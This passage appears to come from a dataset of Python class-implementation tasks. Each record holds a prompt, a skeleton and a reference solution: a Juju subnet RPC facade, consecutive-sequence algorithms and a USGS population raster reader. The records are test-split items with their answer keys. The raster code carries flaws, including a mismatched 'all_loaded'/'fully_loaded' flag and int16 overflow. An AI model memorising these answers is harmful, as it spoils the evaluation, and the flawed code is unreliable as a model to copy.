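The BindEmailOrPhone record dispatches on a string key via `getattr` (a simple factory). Note that `func_list.get(way)` returns None for an unknown `way`, so `getattr(self, None)` would raise TypeError; the standalone sketch below keeps the idiom but fails loudly instead. Everything in it is illustrative and replaces the record's real serializer/cache plumbing with fakes.

class Binder:
    """Standalone sketch of the record's string-keyed dispatch; handlers are fakes."""

    def bind_email(self, payload):
        return 'email bound to ' + payload['email']

    def bind_phone(self, payload):
        return 'phone bound to ' + payload['phone']

    def factory(self, way, payload):
        handlers = {'email': 'bind_email', 'phone': 'bind_phone'}
        name = handlers.get(way)
        if name is None:  # otherwise getattr(self, None) raises TypeError
            raise ValueError('unsupported way: %r' % way)
        return getattr(self, name)(payload)

print(Binder().factory('phone', {'phone': '13800000000'}))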
_params = dict()\n msg = dict(type='Subnets', request='ListSubnets', version=5, params=_params)\n _params['space-tag'] = space_tag\n _params['zone'] = zone\n reply = await self.rpc(msg)\n return reply\n<|end_body_1|>\n\n<|body_start_2|>\n if cidrs is not None and (not isinstance(cidrs, (bytes, str, list))):\n raise Exception('Expected cidrs to be a Sequence, received: {}'.format(type(cidrs)))\n _params = dict()\n msg = dict(type='Subnets', request='SubnetsByCIDR', version=5, params=_params)\n _params['cidrs'] = cidrs\n reply = await self.rpc(msg)\n return reply\n<|end_body_2|>\n", "class_docstring": "", "class_name": "SubnetsFacade", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SubnetsFacade:\n\n async def AllZones(self):\n \"\"\"AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\"\"\"\n <|body_0|>\n\n async def ListSubnets(self, space_tag=None, zone=None):\n \"\"\"ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\"\"\"\n <|body_1|>\n\n async def SubnetsByCIDR(self, cidrs=None):\n \"\"\"SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. cidrs : typing.Sequence[str] Returns -> SubnetsResults\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n _params = dict()\n msg = dict(type='Subnets', request='AllZones', version=5, params=_params)\n reply = await self.rpc(msg)\n return reply\n<|end_body_0|>\n\n<|body_start_1|>\n if space_tag is not None and (not isinstance(space_tag, (bytes, str))):\n raise Exception('Expected space_tag to be a str, received: {}'.format(type(space_tag)))\n if zone is not None and (not isinstance(zone, (bytes, str))):\n raise Exception('Expected zone to be a str, received: {}'.format(type(zone)))\n _params = dict()\n msg = dict(type='Subnets', request='ListSubnets', version=5, params=_params)\n _params['space-tag'] = space_tag\n _params['zone'] = zone\n reply = await self.rpc(msg)\n return reply\n<|end_body_1|>\n\n<|body_start_2|>\n if cidrs is not None and (not isinstance(cidrs, (bytes, str, list))):\n raise Exception('Expected cidrs to be a Sequence, received: {}'.format(type(cidrs)))\n _params = dict()\n msg = dict(type='Subnets', request='SubnetsByCIDR', version=5, params=_params)\n _params['cidrs'] = cidrs\n reply = await self.rpc(msg)\n return reply\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000133", "length_bytes": 41639, "license_type": "permissive", "methods": [{"docstring": "AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults", "name": "AllZones", "signature": "async def AllZones(self)"}, {"docstring": "ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults", "name": "ListSubnets", "signature": "async def ListSubnets(self, space_tag=None, zone=None)"}, {"docstring": "SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. 
cidrs : typing.Sequence[str] Returns -> SubnetsResults", "name": "SubnetsByCIDR", "signature": "async def SubnetsByCIDR(self, cidrs=None)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_000530", "prompt": "Implement the Python class `SubnetsFacade` described below.\n\nClass description:\nImplement the SubnetsFacade class.\n\nMethod signatures and docstrings:\n- async def AllZones(self): AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\n- async def ListSubnets(self, space_tag=None, zone=None): ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\n- async def SubnetsByCIDR(self, cidrs=None): SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. cidrs : typing.Sequence[str] Returns -> SubnetsResults", "prompted_full_text": "Implement the Python class `SubnetsFacade` described below.\n\nClass description:\nImplement the SubnetsFacade class.\n\nMethod signatures and docstrings:\n- async def AllZones(self): AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\n- async def ListSubnets(self, space_tag=None, zone=None): ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\n- async def SubnetsByCIDR(self, cidrs=None): SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. cidrs : typing.Sequence[str] Returns -> SubnetsResults\n\n<|skeleton|>\nclass SubnetsFacade:\n\n async def AllZones(self):\n \"\"\"AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\"\"\"\n <|body_0|>\n\n async def ListSubnets(self, space_tag=None, zone=None):\n \"\"\"ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\"\"\"\n <|body_1|>\n\n async def SubnetsByCIDR(self, cidrs=None):\n \"\"\"SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. 
cidrs : typing.Sequence[str] Returns -> SubnetsResults\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n _params = dict()\n msg = dict(type='Subnets', request='AllZones', version=5, params=_params)\n reply = await self.rpc(msg)\n return reply\n<|end_body_0|>\n\n<|body_start_1|>\n if space_tag is not None and (not isinstance(space_tag, (bytes, str))):\n raise Exception('Expected space_tag to be a str, received: {}'.format(type(space_tag)))\n if zone is not None and (not isinstance(zone, (bytes, str))):\n raise Exception('Expected zone to be a str, received: {}'.format(type(zone)))\n _params = dict()\n msg = dict(type='Subnets', request='ListSubnets', version=5, params=_params)\n _params['space-tag'] = space_tag\n _params['zone'] = zone\n reply = await self.rpc(msg)\n return reply\n<|end_body_1|>\n\n<|body_start_2|>\n if cidrs is not None and (not isinstance(cidrs, (bytes, str, list))):\n raise Exception('Expected cidrs to be a Sequence, received: {}'.format(type(cidrs)))\n _params = dict()\n msg = dict(type='Subnets', request='SubnetsByCIDR', version=5, params=_params)\n _params['cidrs'] = cidrs\n reply = await self.rpc(msg)\n return reply\n<|end_body_2|>\n", "revision_id": "f21bc426952579efb980439f6a07d59bcb4cce0b", "skeleton": "<|skeleton|>\nclass SubnetsFacade:\n\n async def AllZones(self):\n \"\"\"AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\"\"\"\n <|body_0|>\n\n async def ListSubnets(self, space_tag=None, zone=None):\n \"\"\"ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\"\"\"\n <|body_1|>\n\n async def SubnetsByCIDR(self, cidrs=None):\n \"\"\"SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. cidrs : typing.Sequence[str] Returns -> SubnetsResults\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SubnetsFacade:\n async def AllZones(self):\n \"\"\"AllZones returns all availability zones known to Juju. If a zone is unusable, unavailable, or deprecated the Available field will be false. Returns -> ZoneResults\"\"\"\n _params = dict()\n msg = dict(type='Subnets', request='AllZones', version=5, params=_params)\n reply = await self.rpc(msg)\n return reply\n\n async def ListSubnets(self, space_tag=None, zone=None):\n \"\"\"ListSubnets returns the matching subnets after applying optional filters. space_tag : str zone : str Returns -> ListSubnetsResults\"\"\"\n if space_tag is not None and (not isinstance(space_tag, (bytes, str))):\n raise Exception('Expected space_tag to be a str, received: {}'.format(type(space_tag)))\n if zone is not None and (not isinstance(zone, (bytes, str))):\n raise Exception('Expected zone to be a str, received: {}'.format(type(zone)))\n _params = dict()\n msg = dict(type='Subnets', request='ListSubnets', version=5, params=_params)\n _params['space-tag'] = space_tag\n _params['zone'] = zone\n reply = await self.rpc(msg)\n return reply\n\n async def SubnetsByCIDR(self, cidrs=None):\n \"\"\"SubnetsByCIDR returns the collection of subnets matching each CIDR in the input. 
cidrs : typing.Sequence[str] Returns -> SubnetsResults\"\"\"\n if cidrs is not None and (not isinstance(cidrs, (bytes, str, list))):\n raise Exception('Expected cidrs to be a Sequence, received: {}'.format(type(cidrs)))\n _params = dict()\n msg = dict(type='Subnets', request='SubnetsByCIDR', version=5, params=_params)\n _params['cidrs'] = cidrs\n reply = await self.rpc(msg)\n return reply\n", "source": "the_stack_v2_python_sparse", "source_path": "juju/client/_client5.py", "source_repo": "juju/python-libjuju", "split": "test", "star_events_count": 63} {"blob_id": "92d897d3613bf38f74ff95557c17964b76e4ba8b", "bodies": ["longest_streak = 0\nnum_set = set(nums)\nfor num in num_set:\n if num - 1 not in num_set:\n current_num = num\n current_streak = 1\n while current_num + 1 in num_set:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\nreturn longest_streak", "if not nums:\n return 0\nlongest_streak = current_streak = 1\nnums.sort()\nfor i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n if nums[i] == nums[i - 1] + 1:\n current_streak += 1\n else:\n longest_streak = max(longest_streak, current_streak)\n current_streak = 1\nreturn max(longest_streak, current_streak)", "longest_streak = 0\nfor num in nums:\n current_num = num\n current_streak = 1\n while current_num + 1 in nums:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\nreturn longest_streak"], "bodies_text": "<|body_start_0|>\n longest_streak = 0\n num_set = set(nums)\n for num in num_set:\n if num - 1 not in num_set:\n current_num = num\n current_streak = 1\n while current_num + 1 in num_set:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n<|end_body_0|>\n\n<|body_start_1|>\n if not nums:\n return 0\n longest_streak = current_streak = 1\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n if nums[i] == nums[i - 1] + 1:\n current_streak += 1\n else:\n longest_streak = max(longest_streak, current_streak)\n current_streak = 1\n return max(longest_streak, current_streak)\n<|end_body_1|>\n\n<|body_start_2|>\n longest_streak = 0\n for num in nums:\n current_num = num\n current_streak = 1\n while current_num + 1 in nums:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n<|end_body_2|>\n", "class_docstring": "", "class_name": "Sequence", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Sequence:\n\n def find_longest_consecutive(self, nums: List[int]) -> int:\n \"\"\"Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\"\"\"\n <|body_0|>\n\n def find_longest_consecutive_(self, nums: List[int]) -> int:\n \"\"\"Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_1|>\n\n def find_longest_consecutive__(self, nums: List[int]) -> int:\n \"\"\"Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n longest_streak = 0\n num_set = set(nums)\n for num in num_set:\n if num - 1 not in num_set:\n current_num = num\n current_streak = 1\n while current_num + 1 in num_set:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return 
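Each SubnetsFacade method validates its arguments, builds a `{'type', 'request', 'version', 'params'}` envelope, and awaits `self.rpc(msg)`. A sketch of the resulting message shape using a stubbed `rpc`, assuming the record's class is in scope; nothing here contacts a real Juju controller.

import asyncio

class FakeSubnetsFacade(SubnetsFacade):  # reuses the record's class, stubbing rpc()
    async def rpc(self, msg):
        return {'echo': msg}  # a real facade sends this over the API connection

async def main():
    reply = await FakeSubnetsFacade().ListSubnets(space_tag='space-alpha', zone='az1')
    print(reply)
    # {'echo': {'type': 'Subnets', 'request': 'ListSubnets', 'version': 5,
    #           'params': {'space-tag': 'space-alpha', 'zone': 'az1'}}}

asyncio.run(main())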
longest_streak\n<|end_body_0|>\n\n<|body_start_1|>\n if not nums:\n return 0\n longest_streak = current_streak = 1\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n if nums[i] == nums[i - 1] + 1:\n current_streak += 1\n else:\n longest_streak = max(longest_streak, current_streak)\n current_streak = 1\n return max(longest_streak, current_streak)\n<|end_body_1|>\n\n<|body_start_2|>\n longest_streak = 0\n for num in nums:\n current_num = num\n current_streak = 1\n while current_num + 1 in nums:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000134", "length_bytes": 2192, "license_type": "no_license", "methods": [{"docstring": "Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:", "name": "find_longest_consecutive", "signature": "def find_longest_consecutive(self, nums: List[int]) -> int"}, {"docstring": "Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:", "name": "find_longest_consecutive_", "signature": "def find_longest_consecutive_(self, nums: List[int]) -> int"}, {"docstring": "Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:", "name": "find_longest_consecutive__", "signature": "def find_longest_consecutive__(self, nums: List[int]) -> int"}], "n_methods": 3, "prompt": "Implement the Python class `Sequence` described below.\n\nClass description:\nImplement the Sequence class.\n\nMethod signatures and docstrings:\n- def find_longest_consecutive(self, nums: List[int]) -> int: Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\n- def find_longest_consecutive_(self, nums: List[int]) -> int: Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\n- def find_longest_consecutive__(self, nums: List[int]) -> int: Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:", "prompted_full_text": "Implement the Python class `Sequence` described below.\n\nClass description:\nImplement the Sequence class.\n\nMethod signatures and docstrings:\n- def find_longest_consecutive(self, nums: List[int]) -> int: Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\n- def find_longest_consecutive_(self, nums: List[int]) -> int: Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\n- def find_longest_consecutive__(self, nums: List[int]) -> int: Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:\n\n<|skeleton|>\nclass Sequence:\n\n def find_longest_consecutive(self, nums: List[int]) -> int:\n \"\"\"Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\"\"\"\n <|body_0|>\n\n def find_longest_consecutive_(self, nums: List[int]) -> int:\n \"\"\"Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_1|>\n\n def find_longest_consecutive__(self, nums: List[int]) -> int:\n \"\"\"Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n longest_streak = 0\n num_set = set(nums)\n for num in num_set:\n if num - 1 not in num_set:\n 
current_num = num\n current_streak = 1\n while current_num + 1 in num_set:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n<|end_body_0|>\n\n<|body_start_1|>\n if not nums:\n return 0\n longest_streak = current_streak = 1\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n if nums[i] == nums[i - 1] + 1:\n current_streak += 1\n else:\n longest_streak = max(longest_streak, current_streak)\n current_streak = 1\n return max(longest_streak, current_streak)\n<|end_body_1|>\n\n<|body_start_2|>\n longest_streak = 0\n for num in nums:\n current_num = num\n current_streak = 1\n while current_num + 1 in nums:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n<|end_body_2|>\n", "revision_id": "65cc78b5afa0db064f9fe8f06597e3e120f7363d", "skeleton": "<|skeleton|>\nclass Sequence:\n\n def find_longest_consecutive(self, nums: List[int]) -> int:\n \"\"\"Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\"\"\"\n <|body_0|>\n\n def find_longest_consecutive_(self, nums: List[int]) -> int:\n \"\"\"Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_1|>\n\n def find_longest_consecutive__(self, nums: List[int]) -> int:\n \"\"\"Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Sequence:\n def find_longest_consecutive(self, nums: List[int]) -> int:\n \"\"\"Approach: Hash Set and Intelligence Sequence Building Time Complexity: O(n) Space Complexity: O(n) :param nums: :return:\"\"\"\n longest_streak = 0\n num_set = set(nums)\n for num in num_set:\n if num - 1 not in num_set:\n current_num = num\n current_streak = 1\n while current_num + 1 in num_set:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n\n def find_longest_consecutive_(self, nums: List[int]) -> int:\n \"\"\"Approach: Sorting Time Complexity: O(n log n) Space Complexity: O(1) :param nums: :return:\"\"\"\n if not nums:\n return 0\n longest_streak = current_streak = 1\n nums.sort()\n for i in range(1, len(nums)):\n if nums[i] != nums[i - 1]:\n if nums[i] == nums[i - 1] + 1:\n current_streak += 1\n else:\n longest_streak = max(longest_streak, current_streak)\n current_streak = 1\n return max(longest_streak, current_streak)\n\n def find_longest_consecutive__(self, nums: List[int]) -> int:\n \"\"\"Approach: Brute Force Time Complexity: O(n^3) Space Complexity: O(1) :param nums: :return:\"\"\"\n longest_streak = 0\n for num in nums:\n current_num = num\n current_streak = 1\n while current_num + 1 in nums:\n current_num += 1\n current_streak += 1\n longest_streak = max(longest_streak, current_streak)\n return longest_streak\n", "source": "the_stack_v2_python_sparse", "source_path": "data_structures/longest_consecutive_sequence.py", "source_repo": "Shiv2157k/leet_code", "split": "test", "star_events_count": 1} {"blob_id": "6ad0c7e954ef31d126d5e6007ca0e212d1c01f42", "bodies": ["self.lazy_load = lazy_load\nself.fully_loaded = False\nif not pop_directory:\n pop_directory = DEFAULT_POP_DIR\ntiff_path = glob.glob(os.path.join(pop_directory, '*.tif'))\nif not tiff_path:\n raise ValueError('No TIFF file name 
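The Sequence record contrasts three longest-consecutive-run strategies (hash set O(n), sorting O(n log n), brute force O(n^3)); the O(n) trick is to start counting only at numbers whose predecessor is absent, so each chain is walked exactly once. A small cross-check, assuming the record's class and `from typing import List` are in scope; fresh list copies are passed because the sorting variant mutates its argument.

from typing import List  # required by the record's annotations

seq = Sequence()
nums = [100, 4, 200, 1, 3, 2]
assert seq.find_longest_consecutive(list(nums)) == 4    # hash set, O(n)
assert seq.find_longest_consecutive_(list(nums)) == 4   # sorting; mutates its argument
assert seq.find_longest_consecutive__(list(nums)) == 4  # brute force; only for tiny inputs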
in directory: %s' % pop_directory)\nself._tiff_path = tiff_path[0]\nself._raster_info = _RasterInfo(self._tiff_path)\nself._raster = np.zeros((self._raster_info.height, self._raster_info.width), dtype=np.uint16)\ndataset = gdal.Open(self._tiff_path)\nraster_band = dataset.GetRasterBand(1)\nself._block_xsize, self._block_ysize = raster_band.GetBlockSize()\ndataset = None\nself._raster_mask = np.zeros((self._raster_info.height // self._block_ysize + 1, self._raster_info.width // self._block_xsize + 1), dtype=np.bool)", "dataset = gdal.Open(self._tiff_path)\nraster_band = dataset.GetRasterBand(1)\nrow_min, row_max = (0, dataset.RasterYSize - 1)\ncol_min, col_max = (0, dataset.RasterXSize - 1)\nif box:\n row_se, col_se = self._raster_info.Indexes(box[0], box[1])\n row_ne, col_ne = self._raster_info.Indexes(box[2], box[1])\n row_sw, col_sw = self._raster_info.Indexes(box[0], box[3])\n row_nw, col_nw = self._raster_info.Indexes(box[2], box[3])\n row_min = max(min(row_ne, row_nw), 0)\n row_max = min(max(row_se, row_sw), dataset.RasterYSize - 1)\n col_min = max(min(col_se, col_ne), 0)\n col_max = min(max(col_sw, col_nw), dataset.RasterXSize - 1)\nb_y_min = int(row_min // self._block_ysize)\nb_y_max = int(row_max // self._block_ysize)\nb_x_min = int(col_min // self._block_xsize)\nb_x_max = int(col_max // self._block_xsize)\nfor b_y in range(b_y_min, b_y_max + 1):\n for b_x in range(b_x_min, b_x_max + 1):\n if self._raster_mask[b_y, b_x]:\n continue\n yoff, xoff = (b_y * self._block_ysize, b_x * self._block_xsize)\n win_xsize, win_ysize = raster_band.GetActualBlockSize(b_x, b_y)\n block = raster_band.ReadAsArray(xoff=xoff, yoff=yoff, win_xsize=win_xsize, win_ysize=win_ysize)\n self._raster[yoff:yoff + win_ysize, xoff:xoff + win_xsize] = np.minimum(block, 65500)\n self._raster_mask[b_y, b_x] = True\nif box is None:\n self.all_loaded = True\ndataset = None", "if len(latitudes) == 0:\n return 0\nlatitudes = np.asarray(latitudes)\nlongitudes = np.asarray(longitudes)\ndensities = np.zeros(len(latitudes), dtype=np.int16)\nrows, cols = self._raster_info.Indexes(latitudes, longitudes)\nidx_inside = np.where((rows >= 0) & (cols >= 0) & (rows < self._raster.shape[0]) & (cols < self._raster.shape[1]))[0]\nif self.lazy_load and (not self.fully_loaded):\n lat_min, lat_max = (np.min(latitudes), np.max(latitudes))\n lon_min, lon_max = (np.min(longitudes), np.max(longitudes))\n self.LoadRaster((lat_min, lon_min, lat_max, lon_max))\ndensities[idx_inside] = self._raster[rows[idx_inside], cols[idx_inside]]\nreturn densities"], "bodies_text": "<|body_start_0|>\n self.lazy_load = lazy_load\n self.fully_loaded = False\n if not pop_directory:\n pop_directory = DEFAULT_POP_DIR\n tiff_path = glob.glob(os.path.join(pop_directory, '*.tif'))\n if not tiff_path:\n raise ValueError('No TIFF file name in directory: %s' % pop_directory)\n self._tiff_path = tiff_path[0]\n self._raster_info = _RasterInfo(self._tiff_path)\n self._raster = np.zeros((self._raster_info.height, self._raster_info.width), dtype=np.uint16)\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n self._block_xsize, self._block_ysize = raster_band.GetBlockSize()\n dataset = None\n self._raster_mask = np.zeros((self._raster_info.height // self._block_ysize + 1, self._raster_info.width // self._block_xsize + 1), dtype=np.bool)\n<|end_body_0|>\n\n<|body_start_1|>\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n row_min, row_max = (0, dataset.RasterYSize - 1)\n col_min, col_max = (0, dataset.RasterXSize - 
1)\n if box:\n row_se, col_se = self._raster_info.Indexes(box[0], box[1])\n row_ne, col_ne = self._raster_info.Indexes(box[2], box[1])\n row_sw, col_sw = self._raster_info.Indexes(box[0], box[3])\n row_nw, col_nw = self._raster_info.Indexes(box[2], box[3])\n row_min = max(min(row_ne, row_nw), 0)\n row_max = min(max(row_se, row_sw), dataset.RasterYSize - 1)\n col_min = max(min(col_se, col_ne), 0)\n col_max = min(max(col_sw, col_nw), dataset.RasterXSize - 1)\n b_y_min = int(row_min // self._block_ysize)\n b_y_max = int(row_max // self._block_ysize)\n b_x_min = int(col_min // self._block_xsize)\n b_x_max = int(col_max // self._block_xsize)\n for b_y in range(b_y_min, b_y_max + 1):\n for b_x in range(b_x_min, b_x_max + 1):\n if self._raster_mask[b_y, b_x]:\n continue\n yoff, xoff = (b_y * self._block_ysize, b_x * self._block_xsize)\n win_xsize, win_ysize = raster_band.GetActualBlockSize(b_x, b_y)\n block = raster_band.ReadAsArray(xoff=xoff, yoff=yoff, win_xsize=win_xsize, win_ysize=win_ysize)\n self._raster[yoff:yoff + win_ysize, xoff:xoff + win_xsize] = np.minimum(block, 65500)\n self._raster_mask[b_y, b_x] = True\n if box is None:\n self.all_loaded = True\n dataset = None\n<|end_body_1|>\n\n<|body_start_2|>\n if len(latitudes) == 0:\n return 0\n latitudes = np.asarray(latitudes)\n longitudes = np.asarray(longitudes)\n densities = np.zeros(len(latitudes), dtype=np.int16)\n rows, cols = self._raster_info.Indexes(latitudes, longitudes)\n idx_inside = np.where((rows >= 0) & (cols >= 0) & (rows < self._raster.shape[0]) & (cols < self._raster.shape[1]))[0]\n if self.lazy_load and (not self.fully_loaded):\n lat_min, lat_max = (np.min(latitudes), np.max(latitudes))\n lon_min, lon_max = (np.min(longitudes), np.max(longitudes))\n self.LoadRaster((lat_min, lon_min, lat_max, lon_max))\n densities[idx_inside] = self._raster[rows[idx_inside], cols[idx_inside]]\n return densities\n<|end_body_2|>\n", "class_docstring": "USGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868", "class_name": "UsgsPopDriver", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UsgsPopDriver:\n \"\"\"USGS Population Raster driver. This class manages the reading of population raster data provided by USGS at: https://www.sciencebase.gov/catalog/item/57753ebee4b07dd077c70868\"\"\"\n\n def __init__(self, pop_directory=None, lazy_load=False):\n \"\"\"Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).\"\"\"\n <|body_0|>\n\n def LoadRaster(self, box=None):\n \"\"\"Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. If None, the full raster is loaded in memory.\"\"\"\n <|body_1|>\n\n def GetPopulationDensity(self, latitudes, longitudes):\n \"\"\"Retrieves the population density on locations. Args: latitudes: A sequence of points latitudes. longitudes: A sequence of points longitudes. 
Returns: The population density (pop/km2) as a ndarray (dtype=int16).\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.lazy_load = lazy_load\n self.fully_loaded = False\n if not pop_directory:\n pop_directory = DEFAULT_POP_DIR\n tiff_path = glob.glob(os.path.join(pop_directory, '*.tif'))\n if not tiff_path:\n raise ValueError('No TIFF file name in directory: %s' % pop_directory)\n self._tiff_path = tiff_path[0]\n self._raster_info = _RasterInfo(self._tiff_path)\n self._raster = np.zeros((self._raster_info.height, self._raster_info.width), dtype=np.uint16)\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n self._block_xsize, self._block_ysize = raster_band.GetBlockSize()\n dataset = None\n self._raster_mask = np.zeros((self._raster_info.height // self._block_ysize + 1, self._raster_info.width // self._block_xsize + 1), dtype=np.bool)\n<|end_body_0|>\n\n<|body_start_1|>\n dataset = gdal.Open(self._tiff_path)\n raster_band = dataset.GetRasterBand(1)\n row_min, row_max = (0, dataset.RasterYSize - 1)\n col_min, col_max = (0, dataset.RasterXSize - 1)\n if box:\n row_se, col_se = self._raster_info.Indexes(box[0], box[1])\n row_ne, col_ne = self._raster_info.Indexes(box[2], box[1])\n row_sw, col_sw = self._raster_info.Indexes(box[0], box[3])\n row_nw, col_nw = self._raster_info.Indexes(box[2], box[3])\n row_min = max(min(row_ne, row_nw), 0)\n row_max = min(max(row_se, row_sw), dataset.RasterYSize - 1)\n col_min = max(min(col_se, col_ne), 0)\n col_max = min(max(col_sw, col_nw), dataset.RasterXSize - 1)\n b_y_min = int(row_min // self._block_ysize)\n b_y_max = int(row_max // self._block_ysize)\n b_x_min = int(col_min // self._block_xsize)\n b_x_max = int(col_max // self._block_xsize)\n for b_y in range(b_y_min, b_y_max + 1):\n for b_x in range(b_x_min, b_x_max + 1):\n if self._raster_mask[b_y, b_x]:\n continue\n yoff, xoff = (b_y * self._block_ysize, b_x * self._block_xsize)\n win_xsize, win_ysize = raster_band.GetActualBlockSize(b_x, b_y)\n block = raster_band.ReadAsArray(xoff=xoff, yoff=yoff, win_xsize=win_xsize, win_ysize=win_ysize)\n self._raster[yoff:yoff + win_ysize, xoff:xoff + win_xsize] = np.minimum(block, 65500)\n self._raster_mask[b_y, b_x] = True\n if box is None:\n self.all_loaded = True\n dataset = None\n<|end_body_1|>\n\n<|body_start_2|>\n if len(latitudes) == 0:\n return 0\n latitudes = np.asarray(latitudes)\n longitudes = np.asarray(longitudes)\n densities = np.zeros(len(latitudes), dtype=np.int16)\n rows, cols = self._raster_info.Indexes(latitudes, longitudes)\n idx_inside = np.where((rows >= 0) & (cols >= 0) & (rows < self._raster.shape[0]) & (cols < self._raster.shape[1]))[0]\n if self.lazy_load and (not self.fully_loaded):\n lat_min, lat_max = (np.min(latitudes), np.max(latitudes))\n lon_min, lon_max = (np.min(longitudes), np.max(longitudes))\n self.LoadRaster((lat_min, lon_min, lat_max, lon_max))\n densities[idx_inside] = self._raster[rows[idx_inside], cols[idx_inside]]\n return densities\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000135", "length_bytes": 9295, "license_type": "permissive", "methods": [{"docstring": "Initializes the driver. Args: pop_directory: The directory holding the USGS population raster. If None, use the default location. lazy_load: If True, then lazy population loading done (as needed).", "name": "__init__", "signature": "def __init__(self, pop_directory=None, lazy_load=False)"}, {"docstring": "Load raster in memory. Args: box: A (lat_min, lon_min, lat_max, lon_max) bounding box. 
